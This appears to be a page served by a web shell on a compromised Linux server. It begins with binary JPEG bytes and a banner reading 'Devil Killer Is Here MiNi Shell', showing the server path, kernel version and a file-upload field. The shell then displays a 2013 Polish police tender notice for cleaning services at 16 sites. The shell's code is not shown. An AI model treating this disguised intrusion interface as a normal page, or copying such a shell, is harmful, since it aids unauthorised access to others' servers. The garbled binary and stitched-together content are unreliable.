JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130301/32309-N-2013.html

<p class="kh_header"><b>Wrocław: Usługa kompleksowa sprzątania w obiektach Komendy Wojewódzkiej Policji we Wrocławiu i obiektach jednostek podległych</b><br>
<b>Numer ogłoszenia: 32309 - 2013; data zamieszczenia: 01.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowa sprzątania w obiektach Komendy Wojewódzkiej Policji we Wrocławiu i obiektach jednostek podległych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa kompleksowa sprzątania w obiektach Komendy Wojewódzkiej Policji we Wrocławiu i obiektach jednostek podległych.
2.	Usługa polegać będzie na utrzymaniu czystości w pomieszczeniach biurowych, ciągach komunikacyjnych, klatkach schodowych, pomieszczeniach socjalnych, sanitariatach przy użyciu własnego sprzętu i środków czystości. Zakres usługi w  częściach 11, 12, 13, 14 (Komisariat Policji w Karpaczu), 15 (Komisariat Policji w Kowarach) obejmuje również utrzymanie czystości w pomieszczeniach technicznych i piwnicach oraz utrzymanie czystości na terenie posesji przy budynku.
3.	Przedmiot zamówienia podzielono na 16 części, biorąc pod uwagę lokalizację poszczególnych jednostek:
3.1.	Część 1 zamówienia: Komenda Wojewódzka Policji we Wrocławiu  ul. Podwale 31-33, 50-040 Wrocław. Powierzchnia kompleksowego sprzątania: 1033,08m2; oraz Komenda Wojewódzka Policji ul. Połbina 1 (Budynek E), 54-151 Wrocław. Powierzchnia kompleksowego sprzątania: 3 033,80m2.
3.2.	Część 2 zamówienia: Komenda Miejska Policji w Wałbrzychu II KP, ul. Psie Pole 7, 58-301 Wałbrzych. Powierzchnia kompleksowego sprzątania: 296m2; oraz Komenda Miejska Policji w Wałbrzychu PDOZ, ul. Mazowiecka 2, 58-300 Wałbrzych. Powierzchnia kompleksowego sprzątania: 402,7m2.
3.3.	Część 3 zamówienia: Komenda Miejska Policji w Legnicy, ul. Stroma 4, 59-220 Legnica. Powierzchnia kompleksowego sprzątania: 216m2.
3.4.	Część 4 zamówienia: Komenda Powiatowa Policji w Złotoryi R-ID Świerzawa, ul. Złotoryjska 23, 59-540 Świerzawa. Powierzchnia kompleksowego sprzątania: 156m2; oraz Komenda Powiatowa Policji w Złotoryi - PPI Wojcieszów ul. Chrobrego 67, 59-550 Wojcieszów. Powierzchnia kompleksowego sprzątania: 85m2.
3.5.	Część 5 zamówienia: Komenda Powiatowa Policji w Polkowicach RD w Gaworzycach, ul. Główna 16 A, 59-180 Gaworzyce. Powierzchnia kompleksowego sprzątania:  172,76m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Grębocicach, ul. Bankowa 2, 59-150 Grębocice. Powierzchnia kompleksowego sprzątania: 72m2; oraz Komenda Powiatowa Policji w Polkowicach RD w Radwanicach ul. Przemysłowa 21, 59-160 Radwanice. Powierzchnia kompleksowego sprzątania: 98m2.
3.6.	Część 6 zamówienia: Komenda Powiatowa Policji w Kłodzku RD w Szczytnej, ul. Wolności 42,  57-330 Szczytna. Powierzchnia kompleksowego sprzątania: 43,53m2.
3.7.	Część 7 zamówienia: Komenda Powiatowa Policji w Kłodzku PP w Międzylesiu, ul. Graniczna 3, 57-530 Międzylesie. Powierzchnia kompleksowego sprzątania: 198,12m2.
3.8.	Część 8 zamówienia: Komenda Powiatowa Policji w Kłodzku  KP w Kudowie Zdrój, ul. Zdrojowa 25, 57-350 Kudowa Zdrój. Powierzchnia kompleksowego sprzątania: 396,20m2.
3.9.	Część 9 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP  w Dusznikach  Zdrój, ul. Rynek 6, 57-340 Duszniki Zdrój. Powierzchnia kompleksowego sprzątania: 68,5m2.
3.10.	Część 10 zamówienia: Komenda Powiatowa Policji w Kłodzku  PP w Stroniu Śląskim, ul. Mickiewicza 2,  57-550 Stronie Śląskie. Powierzchnia kompleksowego sprzątania: 99,95m2.
3.11.	Część 11 zamówienia: Komenda Powiatowa Policji w Strzelinie  PP w Wiązowie, ul. Pocztowa 2, 57-120 Wiązów. Powierzchnia kompleksowego sprzątania: 194,92m2. Powierzchnia terenu zewnętrznego: 12m2.
3.12.	Część 12 zamówienia: Komenda Miejska Policji w Jeleniej Górze, ul. Spółdzielcza 43, 58-500 Jelenia Góra. Powierzchnia kompleksowego sprzątania: 668,20m2. Powierzchnia terenu zewnętrznego: 38,32m2.
3.13.	Część 13 zamówienia: Komenda Miejska Policji w Jeleniej Górze KP  w Szklarskiej Porębie ul. Buczka 1, 58-580 Szklarska Poręba. Powierzchnia kompleksowego sprzątania: 605,55m2. Powierzchnia terenu zewnętrznego: 761,05m2.
3.14.	Część 14 zamówienia: Komenda Miejska Policji w Jeleniej Górze RD Podgórzyn, ul. Żołnierska 13a, 58-562 Podgórzyn. Powierzchnia kompleksowego sprzątania: 13,48m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Karpaczu, ul. Obrońców Pokoju 2b, 58-540 Karpacz. Powierzchnia kompleksowego sprzątania: 746,11m2 Powierzchnia terenu zewnętrznego: 1101,68m2.
3.15.	Część 15 zamówienia: Komenda Miejska Policji w Jeleniej Górze PPI Mysłakowicach, ul. Szkolna 5, 58-533 Mysłakowice. Powierzchnia kompleksowego sprzątania: 43,45m2; oraz Komenda Miejska Policji w Jeleniej Górze KP w Kowarach, ul. Sienkiewicza 7, 58-530 Kowary. Powierzchnia kompleksowego sprzątania: 452,49m2. Powierzchnia terenu zewnętrznego (zamiatanie i odśnieżanie wg potrzeb): 938,32m2.
3.16.	Część 16 zamówienia: Komenda Powiatowa Policji Głogowie RD III, pl. 1000-lecia 1,  67-200 Głogów. Powierzchnia kompleksowego sprzątania: 81m2; oraz Komenda Powiatowa Policji Głogowie RD II, ul. Budziszyńska 9 A, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 112m2; oraz  KPP Głogów RD I, ul. Kosmonautów Polskich 3-5, 67-200 Głogów. Powierzchnia kompleksowego sprzątania: 146m2.
4.	Szczegółowy zakres oraz opis przedmiotu zamówienia w zakresie wszystkich 16 części  określono w załączniku nr 1 do niniejszej SIWZ oraz w załączniku nr 2 do niniejszej SIWZ.
5.	Zamawiający dopuszcza możliwości składania ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części postępowania. 
6.	Kod Wspólnego Słownika Zamówień: 90910000-9 usługi sprzątania. 
7.	Ilekroć w niniejszej specyfikacji istotnych warunków zamówienia i załącznikach, przedmiot zamówienia został określony poprzez wskazanie znaków towarowych, patentów lub pochodzenia, intencją zamawiającego było przedstawienie typu materiału bądź technologii; w takim przypadku zamawiający dopuszcza składanie ofert równoważnych, ale jedynie takich, które gwarantują zachowanie tych samych norm, parametrów i standardów. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego.
8.	Dopuszczalność udziału podwykonawców: Wykonawca może powierzyć wykonanie części zamówienia (określonych prac bądź czynności) podwykonawcom, jednakże w takim przypadku Zamawiający wymaga wskazania w ofercie tych prac lub czynności wraz z podaniem nazw (firm) proponowanych podwykonawców..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu, o których mowa w punktach 1.1.1. - 1.1.4. Rozdział VII SIWZ. 3.1.	W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, których opis sposobu spełniania został dokonany powyżej w punkcie 2 i w ogłoszeniu o zamówieniu, Zamawiający żąda złożenia wraz z ofertą: 
Na podstawie art. 44 Pzp - oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 - 4 ustawy (załącznik numer 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu, o których mowa w punktach 1.1.1. - 1.1.4. Rozdział VII SIWZ. 3.1.	W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, których opis sposobu spełniania został dokonany powyżej w punkcie 2 i w ogłoszeniu o zamówieniu, Zamawiający żąda złożenia wraz z ofertą: 
Na podstawie art. 44 Pzp - oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 - 4 ustawy (załącznik numer 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu, o których mowa w punktach 1.1.1. - 1.1.4. Rozdział VII SIWZ. 3.1.	W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, których opis sposobu spełniania został dokonany powyżej w punkcie 2 i w ogłoszeniu o zamówieniu, Zamawiający żąda złożenia wraz z ofertą: 
Na podstawie art. 44 Pzp - oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 - 4 ustawy (załącznik numer 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu, o których mowa w punktach 1.1.1. - 1.1.4. Rozdział VII SIWZ. 3.1.	W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, których opis sposobu spełniania został dokonany powyżej w punkcie 2 i w ogłoszeniu o zamówieniu, Zamawiający żąda złożenia wraz z ofertą: 
Na podstawie art. 44 Pzp - oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 - 4 ustawy (załącznik numer 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu, o których mowa w punktach 1.1.1. - 1.1.4. Rozdział VII SIWZ. 3.1.	W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, których opis sposobu spełniania został dokonany powyżej w punkcie 2 i w ogłoszeniu o zamówieniu, Zamawiający żąda złożenia wraz z ofertą: 
Na podstawie art. 44 Pzp - oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1 - 4 ustawy (załącznik numer 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.2.3.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 3.2.2. Rozdział VII SIWZ: 
3.2.3.1.	Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że - nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
3.2.3.2.	Dokument lub dokumenty, o których mowa wyżej w punkcie 3.2.3.1., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.2.4.	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 3.2.3.1., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument, o którym mowa wyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.2.5.	W przypadku wątpliwości, co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
3.2.6.	Dokumenty, o których mowa w punktach 3.2.2., 3.2.3., 3.2.4., są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
3.2.7.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
3.2.8.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
ROZDZIAŁ VIII: GRUPA KAPITAŁOWA
1.	Zgodnie z art. 4 pkt 14 ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2007 r. Nr 50 poz. 331 ze zmianami) pod pojęciem grupy kapitałowej rozumie się wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę. 
2.	Pod pojęciem przedsiębiorcy, zgodnie z art. 4 pkt 1 ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (dalej: uokik) rozumie się przedsiębiorcę w rozumieniu przepisów o swobodzie działalności gospodarczej, a także:
2.1.	Osobę fizyczną, osobę prawną, a także jednostkę organizacyjną niemającą osobowości prawnej, której ustawa przyznaje zdolność prawną, organizującą lub świadczącą usługi o charakterze użyteczności publicznej, które nie są działalnością gospodarczą w rozumieniu przepisów o swobodzie działalności gospodarczej,
2.2.	Osobę fizyczną wykonującą zawód we własnym imieniu i na własny rachunek lub prowadzącą działalność w ramach wykonywania takiego zawodu,
2.3.	Osobę fizyczną, która posiada kontrolę, w rozumieniu pkt 4 tejże ustawy, nad co najmniej jednym przedsiębiorcą, choćby nie prowadziła działalności gospodarczej, jeżeli podejmuje dalsze działania podlegające kontroli koncentracji, o której mowa w art. 13 ustawy uokik,
2.4.	związek przedsiębiorców w rozumieniu pkt 2 ustawy uokik (tj. izby, zrzeszenia i inne organizacje zrzeszające przedsiębiorców, o których mowa w ustawie, jak również związki tych organizacji) - na potrzeby przepisów dotyczących praktyk ograniczających konkurencję oraz praktyk naruszających zbiorowe interesy konsumentów.
3.	Pod pojęciem przejęcia kontroli, zgodnie  z art. 4 pkt 4 uokik rozumie się wszelkie formy bezpośredniego lub pośredniego uzyskania przez przedsiębiorcę uprawnień, które osobno albo łącznie, przy uwzględnieniu wszystkich okoliczności prawnych lub faktycznych, umożliwiają wywieranie decydującego wpływu na innego przedsiębiorcę lub przedsiębiorców; uprawnienia takie tworzą w szczególności:
3.1.	dysponowanie bezpośrednio lub pośrednio większością głosów na zgromadzeniu wspólników albo na walnym zgromadzeniu, także jako zastawnik albo użytkownik, bądź w zarządzie innego przedsiębiorcy (przedsiębiorcy zależnego), także na podstawie porozumień z innymi osobami,
3.2.	uprawnienie do powoływania lub odwoływania większości członków zarządu lub rady nadzorczej innego przedsiębiorcy (przedsiębiorcy zależnego), także na podstawie porozumień z innymi osobami,
3.3.	członkowie jego zarządu lub rady nadzorczej stanowią więcej niż połowę członków zarządu innego przedsiębiorcy (przedsiębiorcy zależnego),
3.4.	dysponowanie bezpośrednio lub pośrednio większością głosów w spółce osobowej zależnej albo na walnym zgromadzeniu spółdzielni zależnej, także na podstawie porozumień z innymi osobami,
3.5.	prawo do całego albo do części mienia innego przedsiębiorcy (przedsiębiorcy zależnego),
3.6.	umowa przewidująca zarządzanie innym przedsiębiorcą (przedsiębiorcą zależnym) lub przekazywanie zysku przez takiego przedsiębiorcę.
4.	W związku z powołanymi wyżej przepisami:
4.1.	Wykonawca na podstawie art. 26 ust. 2d Prawa zamówień publicznych składa wraz z ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Prawa zamówień publicznych, albo informację o tym, że nie należy do grupy kapitałowej. Przepisy art. 26 ust. 3 i 4 Prawa zamówień publicznych stosuje się (załącznik numer 7 do SIWZ).
4.2.	Zgodnie z art. 24 ust. 2 pkt 5 Prawa zamówień publicznych z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty lub wnioski o dopuszczenie do udziału w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
4.3.	Zgodnie z art. 24b Prawa zamówień publicznych Zamawiający zwraca się do wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących powiązań, o których mowa w art. 24 ust. 2 pkt 5 Prawa zamówień publicznych, istniejących między przedsiębiorcami, w celu ustalenia, czy zachodzą przesłanki wykluczenia wykonawcy.
4.4.	Zamawiający, oceniając wyjaśnienia, bierze pod uwagę obiektywne czynniki, w szczególności wpływ powiązań, o których mowa w art. 24 ust. 2 pkt 5 Prawa zamówień publicznych, istniejących między przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasady uczciwej konkurencji.
4.5.	Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który nie złożył wyjaśnień, oraz wykonawcę, który nie złożył listy, o której mowa w art. 26 ust. 2d ustawy Prawa zamówień publicznych.
ROZDZIAŁ IX: OŚWIADCZENIA I DOKUMENTY WYMAGANE DO ZAŁĄCZENIA W OFERCIE - NIEZBĘDNE DO PRZEPROWADZENIA POSTĘPOWANIA.
1.	Wypełniony i podpisany formularz ofertowy - załącznik numer 6 do SIWZ.
2.	Oświadczenia, dokumenty, listy i informacje wymienione w Rozdziałach VII i VIII SIWZ oraz Rozdziale IX SIWZ (jeśli dotyczy).
3.	Pisemne zobowiązanie (oryginał) innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia w sytuacji, o której mowa w punkcie 1.2. Rozdział VII SIWZ.
4.	Jeśli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, Zamawiający żąda wskazania przez wykonawcę w ofercie (formularzu ofertowym) części zamówienia, której wykonanie powierzy pod?wykonawcom.
